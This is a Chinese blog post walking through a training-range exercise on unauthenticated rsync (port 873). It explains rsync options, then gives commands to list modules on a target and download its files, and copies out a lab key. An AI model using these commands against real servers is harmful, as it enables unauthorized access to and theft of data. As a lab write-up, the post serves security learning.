rsync未授权访问漏洞利用(端口873) --墨者学院

01 背景介绍

Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员

优点:速度非常快,因为只同步文件当中不同的地方

Rsync默认端口:873

常用指令:

-v, --verbose 详细模式输出。
-q, --quiet 精简输出模式。
-c, --checksum 打开校验开关,强制对文件传输进行校验。
-a, --archive 归档模式,表示以递归方式传输文件,并保持所有文件属性,等于-rlptgoD。
-r, --recursive 对子目录以递归模式处理。
-R, --relative 使用相对路径信息。
-b, --backup 创建备份,也就是对于目的已经存在有同样的文件名时,将老的文件重新命名为~filename。可以使用–suffix选项来指定不同的备份文件前缀。
–backup-dir 将备份文件(如~filename)存放在在目录下。

02 利用方式

rsync IP::   //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip::  //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp  
rsync -avz --port=xxx ip::dddd /tmp    //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径

03 靶场

在这里插入图片描述使用 nmap 查看端口,这里扫不出端口,用题目给的端口

1.查看服务器目录 命令: rsync --port=端口号 ip::

在这里插入图片描述
2.查看服务器目录下的文件 命令: rsync --port=端口号 ip::目录名
在这里插入图片描述3.把服务器目录下的文件拷贝下来 命令: rsync --port=端口号 ip::目录名 /root

在这里插入图片描述得到key
在这里插入图片描述

  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值